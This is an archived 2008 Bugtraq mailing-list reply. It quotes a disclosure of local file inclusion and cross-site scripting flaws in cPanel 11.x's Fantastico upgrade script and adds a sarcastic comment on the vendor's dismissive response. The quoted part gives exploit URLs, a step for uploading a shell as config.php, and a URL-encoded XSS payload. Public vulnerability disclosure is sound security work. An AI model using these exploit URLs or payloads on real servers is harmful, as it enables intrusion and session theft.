Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani

Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani

From: Jan van Niekerk <jvnkrk_at_gmail.com>
Date: Thu, 20 Nov 2008 15:07:55 +0200

On Friday 31 October 2008 15:03:55 irancrash_at_gmail.com wrote:
> ----------------------------------------------------------------
>
> Script : Cpanel 11.x
>
> Type : Local File Inclusion & Cross Site Scripting
>
> Risk : High
>
> ----------------------------------------------------------------
>
> Discovered by : Khashayar Fereidani
>
> **** I am 17 Years Old ****
Happy birthday to you.
>
> My Official Website : http://FEREIDANI.IR
>
> Team Website : http://IRCRASH.COM
>
> Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
>
> Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
>
> ----------------------------------------------------------------
>
> Local File Inclusion Vulnerability :
>
> Note : Rename your shell to config.php and upload with your ftp account in
> ./ directory .... , now login in cpanel and enter vulnerable address in url
> ....
>
>
> https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
>de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
>
> https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra
>de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
>
> https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad
>e.php?action=GoAhead&scriptpath_show=/home/[youruser]/

According to netenberg.com there is no prospect of privilege escalation here.

On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say:
>> I do not see any reason as to why anyone would do this as they can already
>> do the same via cPanel/SSH (this exploit will only work on the cPanel
>> account of the person who wishes to use it; he/she cannot affect any other
>> account on the server).

I guess they feel similarly about the cross-site scripting. You can start
embedding those links in spam to your administrator now.

> ----------------------------------------------------------------
>
> Cross site scripting :
>
> File Address :
> frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%
>20to%201.7.4
>
> Set Action as Upgrade%20to%201.7.4
>
> Vulnerable Variables :
>
> $localapp
> $updatedir
> $scriptpath_show
> $domain_show
> $thispage
> $thisapp
> $currentversion
>
> For Example :
> https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
>de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%
>3C/script%3E
Received on Nov 20 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]